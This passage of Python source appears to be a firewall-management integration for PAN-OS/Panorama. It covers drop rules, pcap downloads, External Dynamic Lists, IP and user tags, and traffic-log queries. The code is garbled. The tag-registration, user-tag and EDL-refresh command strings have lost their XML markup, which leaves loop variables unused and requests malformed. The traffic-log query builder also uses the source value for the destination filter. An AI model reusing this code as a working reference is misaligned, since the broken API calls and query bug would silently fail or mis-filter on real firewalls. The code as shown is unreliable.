body=params)\n if block_destination:\n params = prepare_security_rule_params(api_action='set', action='drop', destination=object_value,\n source=['any'], rulename=rulename + '-to', target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n custom_block_output['IP'] = object_value\n\n elif object_type in ['address-group', 'edl']:\n if block_source:\n params = prepare_security_rule_params(api_action='set', action='drop', source=object_value,\n destination=['any'], rulename=rulename + '-from', target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n if block_destination:\n params = prepare_security_rule_params(api_action='set', action='drop', destination=object_value,\n source=['any'], rulename=rulename + '-to', target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n custom_block_output['AddressGroup'] = object_value\n\n elif object_type == 'url-category':\n params = prepare_security_rule_params(api_action='set', action='drop', source=['any'], destination=['any'],\n category=object_value, rulename=rulename, target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n custom_block_output['CustomURLCategory'] = object_value\n\n elif object_type == 'application':\n params = prepare_security_rule_params(api_action='set', action='drop', source=['any'], destination=['any'],\n application=object_value, rulename=rulename, target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n custom_block_output['Application'] = object_value\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Object was blocked successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": custom_block_output\n }\n })\n\n\n''' PCAPS '''\n\n\n@logger\ndef panorama_list_pcaps_command(args: dict):\n \"\"\"\n Get list of pcap files\n \"\"\"\n pcap_type = args['pcapType']\n params = {\n 'type': 'export',\n 'key': API_KEY,\n 'category': pcap_type\n }\n\n if 'password' in args:\n params['dlp-password'] = args['password']\n elif args['pcapType'] == 'dlp-pcap':\n raise Exception('can not provide dlp-pcap without password')\n\n serial_number = args.get('serialNumber')\n if VSYS and serial_number:\n raise Exception('The serialNumber argument can only be used in a Panorama instance configuration')\n elif DEVICE_GROUP and not serial_number:\n raise Exception('PCAP listing is only supported on Panorama with the serialNumber argument.')\n elif serial_number:\n params['target'] = serial_number\n\n result = http_request(URL, 'GET', params=params, is_pcap=True)\n json_result = json.loads(xml2json(result.text))['response']\n if json_result['@status'] != 'success':\n raise Exception('Request to get list of Pcaps Failed.\\nStatus code: ' + str(\n json_result['response']['@code']) + '\\nWith message: ' + str(json_result['response']['msg']['line']))\n\n dir_listing = json_result['result']['dir-listing']\n if 'file' not in dir_listing:\n return_results(f'PAN-OS has no Pcaps of type: {pcap_type}.')\n else:\n pcaps = dir_listing['file']\n pcap_list = [pcap[1:] for pcap in pcaps]\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': json_result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('List of Pcaps:', pcap_list, ['Pcap name']),\n 'EntryContext': {\n \"Panorama.Pcaps(val.Name == obj.Name)\": pcap_list\n }\n })\n\n\ndef validate_search_time(search_time: str) -> str:\n \"\"\"\n Validate search_time is of format YYYY/MM/DD HH:MM:SS or YYYY/MM/DD and pad with zeroes\n \"\"\"\n try:\n datetime.strptime(search_time, '%Y/%m/%d')\n search_time += ' 00:00:00'\n return search_time\n except ValueError:\n pass\n try:\n datetime.strptime(search_time, '%Y/%m/%d %H:%M:%S')\n return search_time\n except ValueError as err:\n raise ValueError(f\"Incorrect data format. searchTime should be of: YYYY/MM/DD HH:MM:SS or YYYY/MM/DD.\\n\"\n f\"Error is: {str(err)}\")\n\n\n@logger\ndef panorama_get_pcap_command(args: dict):\n \"\"\"\n Get pcap file\n \"\"\"\n pcap_type = args['pcapType']\n params = {\n 'type': 'export',\n 'key': API_KEY,\n 'category': pcap_type\n }\n\n password = args.get('password')\n pcap_id = args.get('pcapID')\n search_time = args.get('searchTime')\n\n if pcap_type == 'dlp-pcap' and not password:\n raise Exception('Can not download dlp-pcap without the password argument.')\n else:\n params['dlp-password'] = password\n if pcap_type == 'threat-pcap' and (not pcap_id or not search_time):\n raise Exception('Can not download threat-pcap without the pcapID and the searchTime arguments.')\n\n pcap_name = args.get('from')\n local_name = args.get('localName')\n serial_no = args.get('serialNo')\n session_id = args.get('sessionID')\n device_name = args.get('deviceName')\n\n serial_number = args.get('serialNumber')\n if VSYS and serial_number:\n raise Exception('The serialNumber argument can only be used in a Panorama instance configuration')\n elif DEVICE_GROUP and not serial_number:\n raise Exception('PCAP listing is only supported on Panorama with the serialNumber argument.')\n elif serial_number:\n params['target'] = serial_number\n\n file_name = None\n if pcap_id:\n params['pcap-id'] = pcap_id\n if pcap_name:\n params['from'] = pcap_name\n file_name = pcap_name\n if local_name:\n params['to'] = local_name\n file_name = local_name\n if serial_no:\n params['serialno'] = serial_no\n if session_id:\n params['sessionid'] = session_id\n if device_name:\n params['device_name'] = device_name\n if search_time:\n search_time = validate_search_time(search_time)\n params['search-time'] = search_time\n\n # set file name to the current time if from/to were not specified\n if not file_name:\n file_name = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')\n\n result = http_request(URL, 'GET', params=params, is_pcap=True)\n\n # due to pcap file size limitation in the product. For more details, please see the documentation.\n if result.headers['Content-Type'] != 'application/octet-stream':\n raise Exception(\n 'PCAP download failed. Most likely cause is the file size limitation.\\n'\n 'For information on how to download manually, see the documentation for this integration.')\n\n file = fileResult(file_name + \".pcap\", result.content)\n return_results(file)\n\n\n''' Applications '''\n\n\ndef prettify_applications_arr(applications_arr: Union[List[dict], dict]):\n pretty_application_arr = []\n if not isinstance(applications_arr, list):\n applications_arr = [applications_arr]\n for i in range(len(applications_arr)):\n application = applications_arr[i]\n pretty_application_arr.append({\n 'SubCategory': application.get('subcategory'),\n 'Risk': application.get('risk'),\n 'Technology': application.get('technology'),\n 'Name': application.get('@name'),\n 'Description': application.get('description'),\n 'Id': application.get('@id'),\n })\n return pretty_application_arr\n\n\n@logger\ndef panorama_list_applications(predefined: bool):\n major_version = get_pan_os_major_version()\n params = {\n 'type': 'config',\n 'action': 'get',\n 'key': API_KEY\n }\n if predefined:\n if major_version < 9:\n raise Exception('Listing predefined applications is only available for PAN-OS 9.X and above versions.')\n else:\n params['xpath'] = '/config/predefined/application'\n else:\n params['xpath'] = XPATH_OBJECTS + \"application/entry\"\n\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n applications = result['response']['result']\n if predefined:\n application_arr = applications.get('application', {}).get('entry')\n else:\n if major_version < 9:\n application_arr = applications.get('entry')\n else:\n application_arr = applications.get('application')\n\n return application_arr\n\n\ndef panorama_list_applications_command(predefined: Optional[str] = None):\n \"\"\"\n List all applications\n \"\"\"\n predefined = predefined == 'true'\n applications_arr = panorama_list_applications(predefined)\n applications_arr_output = prettify_applications_arr(applications_arr)\n headers = ['Id', 'Name', 'Risk', 'Category', 'SubCategory', 'Technology', 'Description']\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': applications_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Applications', t=applications_arr_output, headers=headers),\n 'EntryContext': {\n \"Panorama.Applications(val.Name == obj.Name)\": applications_arr_output\n }\n })\n\n\n''' External Dynamic Lists Commands '''\n\n\ndef prettify_edls_arr(edls_arr: Union[list, dict]):\n pretty_edls_arr = []\n if not isinstance(edls_arr, list): # handle case of only one edl in the instance\n return prettify_edl(edls_arr)\n for edl in edls_arr:\n pretty_edl = {\n 'Name': edl['@name'],\n 'Type': ''.join(edl['type'].keys())\n }\n edl_type = pretty_edl['Type']\n\n if edl['type'][edl_type]:\n if 'url' in edl['type'][edl_type]:\n pretty_edl['URL'] = edl['type'][edl_type]['url']\n if 'certificate-profile' in edl['type'][edl_type]:\n pretty_edl['CertificateProfile'] = edl['type'][edl_type]['certificate-profile']\n if 'recurring' in edl['type'][edl_type]:\n pretty_edl['Recurring'] = ''.join(edl['type'][edl_type]['recurring'].keys())\n if 'description' in edl['type'][edl_type]:\n pretty_edl['Description'] = edl['type'][edl_type]['description']\n\n if DEVICE_GROUP:\n pretty_edl['DeviceGroup'] = DEVICE_GROUP\n\n pretty_edls_arr.append(pretty_edl)\n\n return pretty_edls_arr\n\n\n@logger\ndef panorama_list_edls():\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"external-list/entry\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n return result['response']['result']['entry']\n\n\ndef panorama_list_edls_command():\n \"\"\"\n Get all EDLs\n \"\"\"\n edls_arr = panorama_list_edls()\n edls_output = prettify_edls_arr(edls_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': edls_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('External Dynamic Lists:', edls_output,\n ['Name', 'Type', 'URL', 'Recurring', 'CertificateProfile', 'Description'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edls_output\n }\n })\n\n\ndef prettify_edl(edl: dict):\n pretty_edl = {\n 'Name': edl['@name'],\n 'Type': ''.join(edl['type'].keys())\n }\n edl_type = pretty_edl['Type']\n\n if edl['type'][edl_type]:\n if 'url' in edl['type'][edl_type]:\n pretty_edl['URL'] = edl['type'][edl_type]['url']\n if 'certificate-profile' in edl['type'][edl_type]:\n pretty_edl['CertificateProfile'] = edl['type'][edl_type]['certificate-profile']\n if 'recurring' in edl['type'][edl_type]:\n pretty_edl['Recurring'] = ''.join(edl['type'][edl_type]['recurring'].keys())\n if 'description' in edl['type'][edl_type]:\n pretty_edl['Description'] = edl['type'][edl_type]['description']\n\n if DEVICE_GROUP:\n pretty_edl['DeviceGroup'] = DEVICE_GROUP\n\n return pretty_edl\n\n\n@logger\ndef panorama_get_edl(edl_name: str):\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"external-list/entry[@name='\" + edl_name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_edl_command(edl_name: str):\n \"\"\"\n Get an EDL\n \"\"\"\n edl = panorama_get_edl(edl_name)\n edl_output = prettify_edl(edl)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': edl,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('External Dynamic List:', edl_output,\n ['Name', 'Type', 'URL', 'Recurring', 'CertificateProfile', 'Description'],\n None, True),\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edl_output\n }\n })\n\n\n@logger\ndef panorama_create_edl(edl_name: str, url: str, type_: str, recurring: str, certificate_profile: Optional[str],\n description: Optional[str]):\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"external-list/entry[@name='\" + edl_name + \"']/type/\" + type_,\n 'key': API_KEY\n }\n\n params['element'] = add_argument(url, 'url', False) + '<' + recurring + '/>' + add_argument(\n certificate_profile, 'certificate-profile', False) + add_argument(description, 'description', False)\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_edl_command(args: Dict[str, str]):\n \"\"\"\n Create an edl object\n \"\"\"\n edl_name = args.get('name')\n url = args.get('url', '').replace(' ', '%20')\n type_ = args.get('type')\n recurring = args.get('recurring')\n certificate_profile = args.get('certificate_profile')\n description = args.get('description')\n\n edl = panorama_create_edl(edl_name, url, type_, recurring, certificate_profile, description)\n\n edl_output = {\n 'Name': edl_name,\n 'URL': url,\n 'Type': type_,\n 'Recurring': recurring\n }\n\n if DEVICE_GROUP:\n edl_output['DeviceGroup'] = DEVICE_GROUP\n if description:\n edl_output['Description'] = description\n if certificate_profile:\n edl_output['CertificateProfile'] = certificate_profile\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': edl,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'External Dynamic List was created successfully.',\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edl_output\n }\n })\n\n\n@logger\ndef panorama_edit_edl(edl_name: str, element_to_change: str, element_value: str):\n edl_prev = panorama_get_edl(edl_name)\n if '@dirtyId' in edl_prev:\n LOG(f'Found uncommitted item:\\n{edl_prev}')\n raise Exception('Please commit the instance prior to editing the External Dynamic List')\n edl_type = ''.join(edl_prev['type'].keys())\n edl_output = {'Name': edl_name}\n if DEVICE_GROUP:\n edl_output['DeviceGroup'] = DEVICE_GROUP\n params = {\n 'action': 'edit', 'type': 'config', 'key': API_KEY,\n 'xpath': f\"{XPATH_OBJECTS}external-list/entry[@name='{edl_name}']/type/{edl_type}/{element_to_change}\"\n }\n\n if element_to_change == 'url':\n params['element'] = add_argument_open(element_value, 'url', False)\n result = http_request(URL, 'POST', body=params)\n edl_output['URL'] = element_value\n\n elif element_to_change == 'certificate_profile':\n params['element'] = add_argument_open(element_value, 'certificate-profile', False)\n result = http_request(URL, 'POST', body=params)\n edl_output['CertificateProfile'] = element_value\n\n elif element_to_change == 'description':\n params['element'] = add_argument_open(element_value, 'description', False)\n result = http_request(URL, 'POST', body=params)\n edl_output['Description'] = element_value\n\n # element_to_change == 'recurring'\n else:\n if element_value not in ['five-minute', 'hourly']:\n raise Exception('Recurring segment must be five-minute or hourly')\n params['element'] = '<' + element_value + '/>'\n result = http_request(URL, 'POST', body=params)\n edl_output['Recurring'] = element_value\n\n return result, edl_output\n\n\ndef panorama_edit_edl_command(args: dict):\n \"\"\"\n Edit an EDL\n \"\"\"\n edl_name = args['name']\n element_to_change = args['element_to_change']\n element_value = args['element_value']\n\n result, edl_output = panorama_edit_edl(edl_name, element_to_change, element_value)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'External Dynamic List was edited successfully',\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edl_output\n }\n })\n\n\n@logger\ndef panorama_delete_edl(edl_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"external-list/entry[@name='\" + edl_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_edl_command(edl_name: str):\n \"\"\"\n Delete an EDL\n \"\"\"\n edl = panorama_delete_edl(edl_name)\n edl_output = {'Name': edl_name}\n if DEVICE_GROUP:\n edl_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': edl,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'External Dynamic List was deleted successfully',\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edl_output\n }\n })\n\n\ndef panorama_refresh_edl(edl_name: str, edl_type: str, location: str, vsys: str):\n params = {\n 'type': 'op',\n 'key': API_KEY\n }\n # if refreshing an EDL on the FW\n if not edl_type and not location and not vsys:\n edl = panorama_get_edl(edl_name)\n edl_type = ''.join(edl['type'].keys())\n # if refreshing an EDL on the Panorama\n else:\n if not edl_type or not location or not vsys:\n raise Exception('To refresh an EDL from the Firewall on Panorama'\n ' please use the: edl_type, location and vsys arguments.')\n\n params['cmd'] = f'<{edl_type}>{edl_name}' \\\n f''\n if location:\n params['location'] = location\n if vsys:\n params['vsys'] = vsys\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_refresh_edl_command(args: dict):\n \"\"\"\n Refresh an EDL\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('EDL refresh is only supported on Firewall (not Panorama).')\n\n edl_name = args.get('name', '')\n edl_type = args.get('edl_type', '')\n location = args.get('location', '')\n vsys = args.get('vsys', '')\n\n result = panorama_refresh_edl(edl_name, edl_type, location, vsys)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Refreshed External Dynamic List successfully',\n })\n\n\n''' IP Tags '''\n\n\n@logger\ndef panorama_register_ip_tag(tag: str, ips: List, persistent: str):\n entry: str = ''\n for ip in ips:\n entry += f'{tag}'\n\n params = {\n 'type': 'user-id',\n 'cmd': '2.0update' + entry\n + '',\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_register_ip_tag_command(args: dict):\n \"\"\"\n Register IPs to a Tag\n \"\"\"\n tag = args['tag']\n ips = argToList(args['IPs'])\n\n persistent = args['persistent'] if 'persistent' in args else 'true'\n persistent = '1' if persistent == 'true' else '0'\n\n result = panorama_register_ip_tag(tag, ips, str(persistent))\n\n registered_ip: Dict[str, str] = {}\n # update context only if IPs are persistent\n if persistent == '1':\n # get existing IPs for this tag\n context_ips = demisto.dt(demisto.context(), 'Panorama.DynamicTags(val.Tag ==\\\"' + tag + '\\\").IPs')\n\n if context_ips:\n all_ips = ips + context_ips\n else:\n all_ips = ips\n\n registered_ip = {\n 'Tag': tag,\n 'IPs': all_ips\n }\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Registered ip-tag successfully',\n 'EntryContext': {\n \"Panorama.DynamicTags(val.Tag == obj.Tag)\": registered_ip\n }\n })\n\n\n@logger\ndef panorama_unregister_ip_tag(tag: str, ips: list):\n entry = ''\n for ip in ips:\n entry += '' + tag + ''\n\n params = {\n 'type': 'user-id',\n 'cmd': '2.0update' + entry\n + '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_unregister_ip_tag_command(args: dict):\n \"\"\"\n Register IPs to a Tag\n \"\"\"\n tag = args['tag']\n ips = argToList(args['IPs'])\n\n result = panorama_unregister_ip_tag(tag, ips)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Unregistered ip-tag successfully'\n })\n\n\n''' User Tags '''\n\n\n@logger\ndef panorama_register_user_tag(tag: str, users: List):\n entry: str = ''\n for user in users:\n entry += f'{tag}'\n\n params = {\n 'type': 'user-id',\n 'cmd': f'2.0update{entry}'\n f'',\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_register_user_tag_command(args: dict):\n \"\"\"\n Register Users to a Tag\n \"\"\"\n major_version = get_pan_os_major_version()\n if major_version <= 8:\n raise Exception('The panorama-register-user-tag command is only available for PAN-OS 9.X and above versions.')\n tag = args['tag']\n users = argToList(args['Users'])\n\n result = panorama_register_user_tag(tag, users)\n\n # get existing Users for this tag\n context_users = demisto.dt(demisto.context(), 'Panorama.DynamicTags(val.Tag ==\\\"' + tag + '\\\").Users')\n\n if context_users:\n all_users = users + context_users\n else:\n all_users = users\n\n registered_user = {\n 'Tag': tag,\n 'Users': all_users\n }\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Registered user-tag successfully',\n 'EntryContext': {\n \"Panorama.DynamicTags(val.Tag == obj.Tag)\": registered_user\n }\n })\n\n\n@logger\ndef panorama_unregister_user_tag(tag: str, users: list):\n entry = ''\n for user in users:\n entry += f'{tag}'\n\n params = {\n 'type': 'user-id',\n 'cmd': f'2.0update{entry}'\n f'',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_unregister_user_tag_command(args: dict):\n \"\"\"\n Unregister Users from a Tag\n \"\"\"\n major_version = get_pan_os_major_version()\n if major_version <= 8:\n raise Exception('The panorama-unregister-user-tag command is only available for PAN-OS 9.X and above versions.')\n tag = args['tag']\n users = argToList(args['Users'])\n\n result = panorama_unregister_user_tag(tag, users)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Unregistered user-tag successfully'\n })\n\n\n''' Traffic Logs '''\n\n\ndef build_traffic_logs_query(source: str, destination: Optional[str], receive_time: Optional[str],\n application: Optional[str], to_port: Optional[str], action: Optional[str]):\n query = ''\n if source and len(source) > 0:\n query += '(addr.src in ' + source + ')'\n if destination and len(destination) > 0:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += '(addr.dst in ' + source + ')'\n if receive_time and len(receive_time) > 0:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += '(receive_time geq ' + receive_time + ')'\n if application and len(application) > 0:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += '(app eq ' + application + ')'\n if to_port and len(to_port) > 0:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += '(port.dst eq ' + to_port + ')'\n if action and len(action) > 0:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += '(action eq ' + action + ')'\n return query\n\n\n@logger\ndef panorama_query_traffic_logs(number_of_logs: str, direction: str, query: str, source: str, destination: str,\n receive_time: str, application: str, to_port: str, action: str):\n params = {\n 'type': 'log',\n 'log-type': 'traffic',\n 'key': API_KEY\n }\n\n if query and len(query) > 0:\n params['query'] = query\n else:\n params['query'] = build_traffic_logs_query(source, destination, receive_time, application, to_port, action)\n if number_of_logs:\n params['nlogs'] = number_of_logs\n if direction:\n params['dir'] = direction\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result\n\n\ndef panorama_query_traffic_logs_command(args: dict):\n \"\"\"\n Query the traffic logs\n \"\"\"\n number_of_logs = args.get('number_of_logs')\n direction = args.get('direction')\n query = args.get('query')\n source = args.get('source')\n destination = args.get('destination')\n receive_time = args.get('receive_time')\n application = args.get('application')\n to_port = args.get('to_port')\n action = args.get('action')\n\n if query and (source or destination or receive_time or application or to_port or action):\n raise Exception('Use the query argument or the '\n 'source, destination, receive_time, application, to_port, action arguments to build your query')\n\n result = panorama_query_traffic_logs(number_of_logs, direction, query,\n source, destination, receive_time, application, to_port, action)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. Reason is: ' + result['response']['msg']['line']\n raise Exception('Query traffic logs failed' + message)\n else:\n raise Exception('Query traffic logs failed.')\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result']:\n raise Exception('Missing JobID in response.')\n query_traffic_output = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Traffic Logs:', query_traffic_output, ['JobID', 'Status'],\n removeNull=True),\n 'EntryContext': {\"Panorama.TrafficLogs(val.JobID == obj.JobID)\": query_traffic_output}\n })\n\n\n@logger\ndef panorama_get_traffic_logs(job_id: str):\n params = {\n 'action': 'get',\n 'type': 'log',\n 'job-id': job_id,\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result\n\n\ndef panorama_check_traffic_logs_status_command(job_id: str):\n result = panorama_get_traffic_logs(job_id)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. Reason is: ' + result['response']['msg']['line']\n raise Exception('Query traffic logs failed' + message)\n else:\n raise Exception('Query traffic logs failed.')\n\n query_traffic_status_output = {\n 'JobID': job_id,\n 'Status': 'Pending'\n }\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result'] \\\n or 'status' not in result['response']['result']['job']:\n raise Exception('Missing JobID status in response.')\n if result['response']['result']['job']['status'] == 'FIN':\n query_traffic_status_output['Status'] = 'Completed'\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Traffic Logs status:', query_traffic_status_output, ['JobID', 'Status'],\n removeNull=True),\n 'EntryContext': {\"Panorama.TrafficLogs(val.JobID == obj.JobID)\": query_traffic_status_output}\n })\n\n\ndef prettify_traffic_logs(traffic_logs: List[dict]):\n pretty_traffic_logs_arr = []\n for traffic_log in traffic_logs:\n pretty_traffic_log = {}\n if 'action' in traffic_log:\n pretty_traffic_log['Action'] = traffic_log['action']\n if 'action_source' in traffic_log:\n pretty_traffic_log['ActionSource'] = traffic_log['action_source']\n if 'application' in traffic_log:\n pretty_traffic_log['Application'] = traffic_log['application']\n if 'bytes' in traffic_log:\n pretty_traffic_log['Bytes'] = traffic_log['bytes']\n if 'bytes_received' in traffic_log:\n pretty_traffic_log['BytesReceived'] = traffic_log['bytes_received']\n if 'bytes_sent' in traffic_log:\n pretty_traffic_log['BytesSent'] = traffic_log['bytes_sent']\n if 'category' in traffic_log:\n pretty_traffic_log['Category'] = traffic_log['category']\n if 'device_name' in traffic_log:\n pretty_traffic_log['DeviceName'] = traffic_log['device_name']\n if 'dst' in traffic_log:\n pretty_traffic_log['Destination'] = traffic_log['dst']\n if 'dport' in traffic_log:\n pretty_traffic_log['DestinationPort'] = traffic_log['dport']\n if 'from' in traffic_log:\n pretty_traffic_log['FromZone'] = traffic_log['from']\n if 'proto' in traffic_log:\n pretty_traffic_log['Protocol'] = traffic_log['proto']\n if 'rule' in traffic_log:\n pretty_traffic_log['Rule'] = traffic_log['rule']\n if 'receive_time' in traffic_log:\n pretty_traffic_log['ReceiveTime'] = traffic_log['receive_time']\n if 'session_end_reason' in traffic_log:\n pretty_traffic_log['SessionEndReason'] = traffic_log['session_end_reason']\n if 'src' in traffic_log:\n pretty_traffic_log['Source'] = traffic_log['src']\n if 'sport' in traffic_log:\n pretty_traffic_log['SourcePort'] = traffic_log['sport']\n if 'start' in traffic_log:\n pretty_traffic_log['StartTime'] = traffic_log['start']\n if 'to' in traffic_log:\n pretty_traffic_log['ToZone'] = traffic_log['to']\n\n pretty_traffic_logs_arr.append(pretty_traffic_log)\n return pretty_traffic_logs_arr\n\n\ndef panorama_get_traffic_logs_command(job_id: str):\n result = panorama_get_traffic_logs(job_id)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. Reason is: ' + result['response']['msg']['line']\n raise Exception('Query traffic logs failed' + message)\n else:\n raise Exception('Query traffic logs failed.')\n\n query_traffic_logs_output = {\n 'JobID': job_id,\n 'Status': 'Pending'\n }\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result'] \\\n or 'status' not in result['response']['result']['job']:\n raise Exception('Missing JobID status in response.')\n\n if result['response']['result']['job']['status'] != 'FIN':\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Traffic Logs status:', query_traffic_logs_output,\n ['JobID', 'Status'], removeNull=True),\n 'EntryContext': {\"Panorama.TrafficLogs(val.JobID == obj.JobID)\": query_traffic_logs_output}\n })\n else: # FIN\n query_traffic_logs_output['Status'] = 'Completed'\n if 'response' not in result or 'result' not in result['response'] or 'log' not in result['response']['result'] \\\n or 'logs' not in result['response']['result']['log']:\n raise Exception('Missing logs in response.')\n\n logs = result['response']['result']['log']['logs']\n if logs['@count'] == '0':\n return_results('No traffic logs matched the query')\n else:\n pretty_traffic_logs = prettify_traffic_logs(logs['entry'])\n query_traffic_logs_output['Logs'] = pretty_traffic_logs\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Traffic Logs:', pretty_traffic_logs,\n ['JobID', 'Source', 'SourcePort', 'Destination', 'DestinationPort',\n 'Application', 'Action'], removeNull=True),\n 'EntryContext': {\"Panorama.TrafficLogs(val.JobID == obj.JobID)\": query_traffic_logs_output}\n })\n\n\n''' Logs '''\n\n\ndef build_array_query(query: str, arg_string: str, string: str, operator: str):\n list_string = argToList(arg_string)\n list_string_length = len(list_string)\n\n if list_string_length > 1:\n query += '('\n\n for i, item in enumerate(list_string):\n query += f'({string} {operator} \\'{item}\\')'\n if i < list_string_length - 1:\n query += ' or '\n\n if list_string_length > 1:\n query += ')'\n\n return query\n\n\ndef build_logs_query(address_src: Optional[str], address_dst: Optional[str], ip_: Optional[str],\n zone_src: Optional[str], zone_dst: Optional[str], time_generated: Optional[str],\n action: Optional[str], port_dst: Optional[str], rule: Optional[str], url: Optional[str],\n filedigest: Optional[str]):\n query = ''\n if address_src:\n query += build_array_query(query, address_src, 'addr.src', 'in')\n if address_dst:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, address_dst, 'addr.dst', 'in')\n if ip_:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query = build_array_query(query, ip_, 'addr.src', 'in')\n query += ' or '\n query = build_array_query(query, ip_, 'addr.dst', 'in')\n if zone_src:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, zone_src, 'zone.src', 'eq')\n if zone_dst:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n 